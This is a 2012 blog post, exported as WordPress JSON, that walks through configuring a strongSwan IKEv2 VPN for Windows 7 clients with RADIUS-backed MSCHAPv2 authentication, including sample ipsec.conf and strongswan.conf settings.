{"id":635,"date":"2012-06-08T16:37:22","date_gmt":"2012-06-08T08:37:22","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=635"},"modified":"2012-06-08T16:37:22","modified_gmt":"2012-06-08T08:37:22","slug":"strongwan-ikev2-vpn-for-windows-7","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/06\/08\/strongwan-ikev2-vpn-for-windows-7\/","title":{"rendered":"strongSwan IKEv2 VPN for Windows 7"},"content":{"rendered":"<p>We will build an IKEv2 VPN for Windows 7 using strongSwan, with the client authenticating itself using MSCHAPv2.<\/p>\n<h1>Software<\/h1>\n<ul>\n<li>Slackware 13.37<\/li>\n<li>strongSwan<\/li>\n<li>FreeRADIUS<\/li>\n<li>Samba &#038; LDAP<\/li>\n<\/ul>\n<h1>Infrastructure Design<\/h1>\n<p>Simply put, leftsubnet (the whole private network) uses the entire 192.168.0.0\/16 block, and rightsubnet (all IKEv2 road warriors) is assigned 192.168.76.0\/22.<\/p>\n<h1>strongSwan<\/h1>\n<h2>Installation<\/h2>\n<p><a href=\"http:\/\/www.q-station.net\/kb\/index.php\/2012\/06\/05\/linux-l2tpipsec-vpn-server\/\" title=\"Linux L2TP\/IPsec VPN server\">Refer to this post.<\/a><\/p>\n<h2>Configuration<\/h2>\n<h3>\/usr\/local\/strongswan\/etc\/ipsec.conf<\/h3>\n<pre>\r\n\r\nconfig setup\r\n    nat_traversal=yes\r\n    # virtual_private=%v4:10.0.0.0\/8,%v4:192.168.0.0\/16,%v4:172.16.0.0\/12\r\n    \r\nconn IPSec-IKEv2\r\n    keyexchange=ikev2\r\n    auto=add\r\n    left=%defaultroute\r\n    leftauth=pubkey   \r\n    leftcert=\/usr\/local\/strongswan\/etc\/duo-cert.pem         \r\n    right=%any\r\n    rightauth=eap-radius\r\n    rightsendcert=never   \r\n    eap_identity=%any\r\n    ike=aes256-sha1-modp1024!\r\n    esp=aes256-sha1! \r\n    dpdaction=clear\r\n    dpddelay=300s\r\n    rightsourceip=192.168.76.0\/22\r\n    # rightsourceip=%dhcp\r\n    leftsubnet=192.168.0.0\/16 \r\n    # leftsourceip=%config\r\n<\/pre>\n<p><strong>Windows narrows the traffic sent through the VPN to the IP range defined in leftsubnet.  
To route all Windows client traffic through your gateway, you could use 0.0.0.0\/0.<\/strong><\/p>\n<h3>\/usr\/local\/strongswan\/etc\/strongswan.conf<\/h3>\n<p>In the plugins section:<\/p>\n<pre>\r\ncharon {\r\n   dns1 = 192.168.1.1\r\n   nbns1 = 192.168.1.1\r\n\r\n   threads = 16\r\n\r\n   plugins {\r\n\r\n      sql {\r\n          # loglevel to log into sql database\r\n          loglevel = -1\r\n\r\n          # URI to the database\r\n          # database = sqlite:\/\/\/path\/to\/file.db\r\n          # database = mysql:\/\/user:password@localhost\/database\r\n      }\r\n        \r\n#    dhcp {\r\n#      server = 192.168.1.1\r\n#     }\r\n        \r\n    eap-radius {\r\n       servers {\r\n          vpnserver {\r\n             secret = xxxxxxxx\r\n             address = 127.0.0.1\r\n          }\r\n       }\r\n    }\r\n  }\r\n}\r\n\r\npluto { \r\n                \r\n}\r\n                      \r\nlibstrongswan {\r\n                        \r\n        #  set to no, the DH exponent size is optimized\r\n        #  dh_exponent_ansi_x9_42 = no\r\n}\r\n<\/pre>\n<h1>Windows client<\/h1>\n<p>Install &#038; trust the gateway certificate's issuer in Windows.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>We will build an IKEv2 VPN for Windows 7 using strongSwan, with the client authenticating itself using 
MSCHAPv2.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[27,8],"tags":[75,74,63,60],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/635"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=635"}],"version-history":[{"count":8,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/635\/revisions"}],"predecessor-version":[{"id":644,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/635\/revisions\/644"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=635"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=635"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=635"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}